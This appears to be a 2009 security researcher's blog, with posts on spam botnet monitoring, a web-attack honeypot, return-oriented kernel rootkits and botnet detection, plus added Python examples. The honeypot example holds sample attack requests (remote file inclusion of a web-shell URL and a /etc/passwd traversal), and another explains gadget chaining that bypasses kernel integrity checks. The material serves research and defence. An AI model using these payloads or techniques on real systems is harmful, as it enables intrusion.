"Towards Proactive Spam Filtering"

Friday, July 31. 2009
A common technique employed by spammers is to send spam mails with the help of botnets. In a typical setting, the spammer uses so-called template-based spamming: the attacker sends the bots a spam template that describes the structure of the spam message to be sent. Furthermore, the attacker sends meta-data like a recipient list, a subject list, and a list of URLs that are used to fill in the variables in the template. The bots then construct an email based on the template and the meta-data and send this email to the targets. As a result, the actual work of handling the SMTP communication is moved from the control server to the bots. Nowadays this technique is used by most large spam botnets, like Waledac, Bobax, Rustock, Cutwail, and many of the other major spam botnets, as Joe Stewart explained in detail.

Since spammers nowadays use such a tactic, we can also collect spam mails in a more efficient way: instead of waiting at the end-users' mailboxes or at spamtraps for mail messages to arrive and then deciding whether or not a given message is spam, we directly interact with the servers that are used to control the spam-sending bots. The basic idea is that we execute spambots, i.e., malicious software dedicated to sending spam emails, in a controlled (honeypot) environment and collect all email messages sent by the bots. This enables us to interact directly with the botnet control servers and collect the current spam messages sent by a specific botnet.

We describe this idea in more detail in a short paper that was published at DIMVA'09. The paper is also available on this blog.

Abstract: With increasing security measures in network services, remote exploitation is getting harder. As a result, attackers concentrate on more reliable attack vectors like email: victims are infected using either malicious attachments or links leading to malicious websites. Therefore, efficient filtering and blocking methods for spam messages are needed. Unfortunately, most spam filtering solutions proposed so far are reactive: they require a large amount of both ham and spam messages to efficiently generate rules to differentiate between both. In this paper, we introduce a more proactive approach that allows us to directly collect spam messages by interacting with the spam botnet controllers. We are able to observe current spam runs and obtain a copy of the latest spam messages in a fast and efficient way. Based on the collected information, we are able to generate templates that represent a concise summary of a spam run. The collected data can then be used to improve current spam filtering techniques and develop new avenues to efficiently filter mails.
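To make the two halves of the idea concrete, here is an added example (written for this page, not code from the paper or from any spambot): the bot side fills a template from the meta-data lists, and the analyst side takes the messages collected from a spambot running in the honeypot and recovers a template from them by aligning the messages token by token, then turns that template into a matcher for the spam run. The template, the names, order numbers and pharma.example URLs are all constructed for the example; the alignment uses difflib and keeps only tokens that are identical in every message, so it assumes the variation between messages is substitution of whole words (a slot may still match several words when the regex is applied).

```python
import difflib
import re

VAR = "<VAR>"

# Bot side (constructed): a template plus meta-data lists, as a spammer would push
# them to the bots. Names, order ids and URLs are made up for this example.
SPAM_TEMPLATE = "Hi {name}, your order {orderid} is ready. See {url} for details."
META = {
    "name": ["John", "Mary", "Peter"],
    "orderid": ["48213", "90114", "33017"],
    "url": ["http://pharma.example/a9", "http://pharma.example/k2", "http://pharma.example/qq"],
}


def render_spam_run(template, meta):
    """Bot side: fill every slot from the meta-data lists, one message per recipient."""
    count = len(next(iter(meta.values())))
    return [template.format(**{k: v[i] for k, v in meta.items()}) for i in range(count)]


def extract_template(messages):
    """Analyst side: align the tokenised messages against the first one. A token is
    kept literally only if it is 'equal' in every pairwise alignment; everything
    else becomes a variable slot, and adjacent slots are merged into one."""
    base = messages[0].split(" ")
    invariant = [True] * len(base)
    for other in messages[1:]:
        sm = difflib.SequenceMatcher(a=base, b=other.split(" "), autojunk=False)
        covered = [False] * len(base)
        for tag, i1, i2, _j1, _j2 in sm.get_opcodes():
            if tag == "equal":
                for i in range(i1, i2):
                    covered[i] = True
        invariant = [x and y for x, y in zip(invariant, covered)]
    out = []
    for tok, keep in zip(base, invariant):
        if keep:
            out.append(tok)
        elif not out or out[-1] != VAR:
            out.append(VAR)
    return " ".join(out)


def template_to_regex(template):
    """Turn a template into a matcher: literal tokens are escaped, slots match lazily
    (so a slot can absorb more than one word when applied to new messages)."""
    parts = [r"(.+?)" if tok == VAR else re.escape(tok) for tok in template.split(" ")]
    return re.compile("^" + " ".join(parts) + "$")


if __name__ == "__main__":
    run = render_spam_run(SPAM_TEMPLATE, META)
    tpl = extract_template(run)
    print(tpl)
    rx = template_to_regex(tpl)
    print(rx.match("Hi Anna, your order 77001 is ready. See http://pharma.example/zz for details.") is not None)
```

The recovered template is the "concise summary of a spam run" from the abstract: three messages are enough to mark the salutation, the order number and the URL as variable, and the resulting regex matches a fourth message from the same run while rejecting unrelated mail.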

GSoC'09: Some Updates for Glastopf

Monday, July 20. 2009
Today Lukas committed some major changes to glastopf, his Google Summer of Code project. The goal of glastopf is to learn more about attacks against web applications, mainly by attracting remote file inclusion attacks. The new version features a new parser that should be able to handle more attacks and respond in a more flexible way. Furthermore, the connection to a central database was improved, and the daemon now also drops privileges after starting up.

The software is constantly collecting information, and in the next couple of weeks more analysis tools will be implemented to process the collected data. The current glastopf implementation logs status messages to Twitter: "Got 142 attacks in the last 30 minutes!". More than 13,000 IP addresses were observed and thousands of requests processed.
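As an added illustration of what such a honeypot has to recognise (example code written for this page, not glastopf's own parser), the block below classifies web requests as remote file inclusion attempts when a query parameter carries an absolute URL with a remote host, tallies them per source address, and shows the privilege drop mentioned above done in the right order. The access-log lines are constructed for the example and use documentation address ranges; the `drop_privileges` helper is only defined here, since it needs root to run.

```python
import os
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (Apache common log layout); hosts are from the
# documentation address ranges and the paths are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2009:10:00:01 +0200] "GET /index.php?page=http://198.51.100.7/x/id.txt? HTTP/1.1" 200 512
203.0.113.5 - - [20/Jul/2009:10:00:02 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048
198.51.100.9 - - [20/Jul/2009:10:00:03 +0200] "GET /wp/admin.php?inc=ftp://198.51.100.7/r57.txt HTTP/1.1" 200 512
198.51.100.9 - - [20/Jul/2009:10:00:04 +0200] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 210
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp"}


def parse_log(text):
    """Yield (client_ip, method, request_target, status) for each well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), int(m.group(4))


def rfi_candidates(request_target):
    """Return (param, url) pairs for query parameters whose value is an absolute URL
    with a remote host, the shape of a remote file inclusion attempt such as
    ?page=http://host/shell.txt?  A trailing '?' is commonly appended so that any
    suffix the application concatenates ends up in the query string of the fetch."""
    query = urlsplit(request_target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        candidate = value.rstrip("?")
        parsed = urlsplit(candidate)
        if parsed.scheme.lower() in REMOTE_SCHEMES and parsed.netloc:
            hits.append((name, candidate))
    return hits


def summarize(text):
    """Count RFI attempts per source and collect the injected URLs: the figures a
    honeypot would report, and the list it could fetch to capture the payloads
    (not fetched here, the example runs offline)."""
    per_source = Counter()
    injected = []
    for ip, _method, target, _status in parse_log(text):
        hits = rfi_candidates(target)
        if hits:
            per_source[ip] += 1
            injected.extend(url for _param, url in hits)
    return {"attacks": sum(per_source.values()),
            "sources": dict(per_source),
            "injected_urls": injected}


def drop_privileges(uid, gid):
    """Shed root once the listening socket is bound: supplementary groups first,
    then gid, then uid, so the last step cannot be undone. Verifies the drop by
    trying to regain uid 0, which must fail. Requires root; not called in tests."""
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)
    try:
        os.setuid(0)
    except PermissionError:
        return True
    raise RuntimeError("privileges were not dropped")


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print(f"Got {s['attacks']} attacks from {len(s['sources'])} sources")
    for url in s["injected_urls"]:
        print("  included:", url)
```

Note that the fourth line, a directory traversal, is deliberately not counted: it is a local inclusion attempt with no remote host, and a honeypot aimed at RFI would handle it on a different path.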

"Bypassing Kernel Code Integrity Protection Mechanisms"

Saturday, July 18. 2009
A paper that we will publish next month at USENIX Security'09 is entitled "Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms". In return-oriented programming, an attacker re-uses existing code: he searches for short instruction sequences (often only a single instruction) that are followed by a RET. By cleverly chaining these sequences, an attacker can build a gadget that performs an actual computation, e.g., a gadget that adds two operands. By combining these gadgets, an attacker can then perform arbitrary computations. Return-oriented programming was popularized by Shacham (CCS'07 paper targeting Linux/x86, CCS'08 paper targeting Solaris/SPARC). In our paper we present a system to automatically find useful instructions, build gadgets, and then generate a return-oriented program for Windows as the target OS. In a case study, we show how this system can be used to implement a return-oriented rootkit that bypasses typical kernel code integrity mechanisms. The main insight here is that integrity mechanisms protect against the injection of code; if the attacker re-uses existing code instead, these approaches typically fail.
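The following added example (written for this page; it is not the paper's gadget finder, which works on real kernel images with a full disassembler) shows the two steps in miniature: scanning a code image for known instructions that sit directly in front of a RET, and then executing a chain of such gadget addresses placed on the stack. The code image is a constructed byte string holding real 32-bit x86 encodings at made-up offsets, the opcode table knows only four instructions, and the "CPU" emulates just those four plus RET; nothing in the chain is injected code, which is the point against code-integrity checks.

```python
# Constructed stand-in for a kernel text image: real 32-bit x86 encodings at
# made-up offsets. "Addresses" in this example are offsets into this bytes object.
CODE = bytes([
    0x90, 0x90, 0x90,      # 0:  nop filler, nothing useful before a ret
    0x58, 0xC3,            # 3:  pop eax ; ret
    0x5B, 0xC3,            # 5:  pop ebx ; ret
    0x01, 0xD8, 0xC3,      # 7:  add eax, ebx ; ret
    0x89, 0x03, 0xC3,      # 10: mov [ebx], eax ; ret
    0x31, 0xC0, 0x90,      # 13: xor eax, eax with no ret behind it: not a gadget
])
RET = 0xC3
STOP = 0xFFFFFFFF          # sentinel "return address" that ends the chain

# Tiny opcode table. A real gadget finder needs a full x86 decoder; this only
# recognises the handful of encodings the example uses.
KNOWN = {
    b"\x58": "pop eax",
    b"\x5b": "pop ebx",
    b"\x01\xd8": "add eax, ebx",
    b"\x89\x03": "mov [ebx], eax",
}


def find_gadgets(code):
    """Scan for RET bytes and record any known instruction immediately before one.
    Every byte offset is tried, not only the boundaries a compiler emitted, which
    is how x86 ROP also picks up 'unintended' gadgets inside longer instructions."""
    gadgets = {}
    for i, byte in enumerate(code):
        if byte != RET:
            continue
        for enc, name in KNOWN.items():
            n = len(enc)
            if i >= n and code[i - n:i] == enc:
                gadgets[i - n] = name
                break
    return gadgets


def build_add_store_chain(gadgets, a, b, dst):
    """Return-oriented program that computes a + b and writes the result at dst:
    pop eax <- a ; pop ebx <- b ; add eax, ebx ; pop ebx <- dst ; mov [ebx], eax"""
    addr = {name: off for off, name in gadgets.items()}
    return [addr["pop eax"], a,
            addr["pop ebx"], b,
            addr["add eax, ebx"],
            addr["pop ebx"], dst,
            addr["mov [ebx], eax"],
            STOP]


def run_chain(stack, gadgets, mem):
    """Emulate the chain: `stack` is what the attacker placed in memory, ESP starts
    at its first entry, and every gadget ends in RET, which pops the next address.
    `mem` is a bytearray standing in for writable kernel data. Returns EAX."""
    eax = ebx = 0
    esp = 0

    def pop():
        nonlocal esp
        if esp >= len(stack):
            raise IndexError("chain ran off the end of the stack")
        value = stack[esp]
        esp += 1
        return value

    while True:
        target = pop()                      # the RET of the previous gadget
        if target == STOP:
            return eax
        name = gadgets.get(target)
        if name is None:
            raise ValueError(f"returned into offset {target}, which is not a gadget")
        if name == "pop eax":
            eax = pop() & 0xFFFFFFFF
        elif name == "pop ebx":
            ebx = pop() & 0xFFFFFFFF
        elif name == "add eax, ebx":
            eax = (eax + ebx) & 0xFFFFFFFF
        elif name == "mov [ebx], eax":
            if ebx + 4 > len(mem):
                raise ValueError("store outside emulated memory")
            mem[ebx:ebx + 4] = eax.to_bytes(4, "little")


if __name__ == "__main__":
    g = find_gadgets(CODE)
    for off, name in sorted(g.items()):
        print(f"{off:3d}: {name} ; ret")
    mem = bytearray(64)
    chain = build_add_store_chain(g, 0x1000, 0x234, 8)
    print(hex(run_chain(chain, g, mem)), mem[8:12].hex())
```

The code image is an immutable bytes object and is never touched: a checker that hashes or signs the kernel text would see exactly the same bytes before and after the chain ran, while the chain still performed an addition and a write to data memory.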

Abstract: Protecting the kernel of an operating system against attacks, especially injection of malicious code, is an important factor for implementing secure operating systems. Several kernel integrity protection mechanisms were proposed recently that all have a particular shortcoming: they cannot protect against attacks in which the attacker re-uses existing code within the kernel to perform malicious computations. In this paper, we present the design and implementation of a system that fully automates the process of constructing instruction sequences that can be used by an attacker for malicious computations. We evaluate the system on different commodity operating systems and show the portability and universality of our approach. Finally, we describe the implementation of a practical attack that can bypass existing kernel integrity protection mechanisms.

The paper contains all the details, and the results of our experiments are also available. The main part of this work was performed by Ralf Hund; it was the topic of his thesis. Furthermore, Felix Freiling helped with the project. The word cloud was generated with the help of Wordle.

"Automatically Generating Models for Botnet Detection"

Friday, July 17. 2009
One of the papers that we will publish at the European Symposium on Research in Computer Security (ESORICS'09) focuses on the problem of detecting bots within a given network. Previous research focused, for example, on detecting bots using human-generated signatures and anomaly detectors (e.g., BotHunter) or on correlating the activity of individual hosts in order to find machines that react in lockstep (e.g., BotMiner or TAMD). We present a system that automatically generates signatures that encapsulate the behavior of an infected machine. The important observation is that the principle behind bots is that they receive a command from the botherder and then respond in a specific way. Using real-world traces of many botnets, we show that it is possible to spot the bot responses in the network traces using a change point detection algorithm. Based on this information, we can then identify the commands, and we use all of this information to encode a signature, which we map into Bro rules. Experiments in different networks show that this approach outperforms BotHunter. More information about the approach is available in the paper, and all the gory details are published in a technical report.
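To show the command/response idea end to end, here is an added example (written for this page, not the system from the paper, which works on full packet traces and uses its own detection statistics): a one-sided CUSUM detector locates the point at which a host's outbound connection rate changes, the most recent inbound command-and-control message before that point is taken as the command, and the two are combined into a model. The per-second trace and the C&C conversation are constructed, the `.spam` command syntax is made up, and the rendered signature follows the layout of Bro's signature framework as assumed here; the detector parameters (baseline window, slack, threshold) are example values that would need tuning on real traffic.

```python
import re

# Constructed per-second counts of new outbound TCP connections from one host:
# idle, then a burst (the bot's response), then idle again.
TRACE = [1, 0, 2, 1, 0, 1, 1, 2, 0, 1, 1, 0, 1, 2, 1, 0, 1, 1, 0, 1,
         45, 52, 48, 60, 55, 47, 51, 49, 58, 50,
         1, 0, 1, 2]

# Constructed C&C conversation of the same host as (second, direction, payload);
# the ".spam" command syntax is invented for this example.
CC_STREAM = [
    (3, "in", "PING"),
    (3, "out", "PONG"),
    (18, "in", ".spam start http://198.51.100.7/t.tpl"),
    (18, "out", "ack"),
    (33, "in", "PING"),
]

BASELINE_LEN = 10   # bins used to estimate the idle rate
SLACK = 2.0         # allowance above the idle mean before CUSUM accumulates
THRESHOLD = 20.0    # alarm level for the cumulative sum


def cusum_change_point(trace, baseline_len=BASELINE_LEN, slack=SLACK, threshold=THRESHOLD):
    """One-sided CUSUM: S_t = max(0, S_{t-1} + x_t - mean - slack). An alarm is
    raised the first time S_t exceeds the threshold; the change point estimate is
    the bin after the last one where S_t was still 0. Returns (alarm_t, change_t)
    or None when the trace never leaves its baseline behaviour."""
    mean = sum(trace[:baseline_len]) / baseline_len
    s, last_zero = 0.0, -1
    for t, x in enumerate(trace):
        s = max(0.0, s + x - mean - slack)
        if s > threshold:
            return t, last_zero + 1
        if s == 0.0:
            last_zero = t
    return None


def find_command(stream, change_t, max_lag=5):
    """The command is the most recent inbound C&C message received within
    max_lag seconds before the response onset."""
    cands = [(t, p) for t, d, p in stream if d == "in" and change_t - max_lag <= t < change_t]
    return max(cands) if cands else None


def build_model(trace, stream):
    """Combine the detected response with the command that triggered it."""
    cp = cusum_change_point(trace)
    if cp is None:
        return None
    alarm_t, change_t = cp
    cmd = find_command(stream, change_t)
    if cmd is None:
        return None
    cmd_t, payload = cmd
    # Response part: how long the rate stayed above the idle level and its floor.
    level = sum(trace[:BASELINE_LEN]) / BASELINE_LEN + SLACK
    end = change_t
    while end < len(trace) and trace[end] > level:
        end += 1
    burst = trace[change_t:end]
    return {"command_token": payload.split()[0],
            "command_time": cmd_t,
            "response_onset": change_t,
            "response_duration": len(burst),
            "min_rate": min(burst)}


def render_bro_signature(model, sig_id="bot-cmd-spam"):
    """Emit the command half of the model as a Bro-style signature (layout as in
    Bro's signature framework, assumed here). The response half stays in the
    model for the correlation step that follows a signature hit."""
    token = re.escape(model["command_token"])
    return (f"signature {sig_id} {{\n"
            f"    ip-proto == tcp\n"
            f"    payload /.*{token}/\n"
            f"    event \"bot command {model['command_token']}\"\n"
            f"}}\n")


if __name__ == "__main__":
    model = build_model(TRACE, CC_STREAM)
    print(model)
    print(render_bro_signature(model))
```

The change-point step is what makes the approach independent of prior knowledge about the protocol: the command is found by looking backwards from the onset of the response, not by knowing what commands look like.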

Abstract: A botnet is a network of compromised hosts that is under the control of a single, malicious entity, often called the botmaster. We present a system that aims to detect bots, independent of any prior information about the command and control channels or propagation vectors, and without requiring multiple infections for correlation. Our system relies on detection models that target the characteristic fact that every bot receives commands from the botmaster to which it responds in a specific way. These detection models are generated automatically from network traffic traces recorded from actual bot instances. We have implemented the proposed approach and demonstrate that it can extract effective detection models for a variety of different bot families. These models are precise in describing the activity of bots and raise very few false positives.

This work is a collaboration with Peter Wurzinger, Leyla Bilge, Jan Goebel, Christopher Kruegel, and Engin Kirda. The word cloud at the top of the posting was generated with the help of http://www.wordle.net/.

Alive Again: CWSandbox.org and Me

Wednesday, July 8. 2009
admin
In the last few weeks I did not have much time to blog, my real life kept me busy. In the meantime, I finished my Ph.D. studies at the Laboratory for Dependable Distributed Systems and prepared my move to Vienna: I joined the International Secure Systems Lab (http://www.iseclab.org/), where I now work as a postdoc researcher. For now I stay in academia; let's see what the future brings. Basically, I will continue my work on bots/botnets, honeypots/honeynets, malware analysis, and the underground economy. In the next couple of days I will blog about some recent papers that we published; this will serve as the foundation of my work in the next months.

The public interface to CWSandbox at http://cwsandbox.org/ was offline for several weeks due to some internal problems, but the service is now online again. The backend was completely revised, and a new database layout provides better scalability.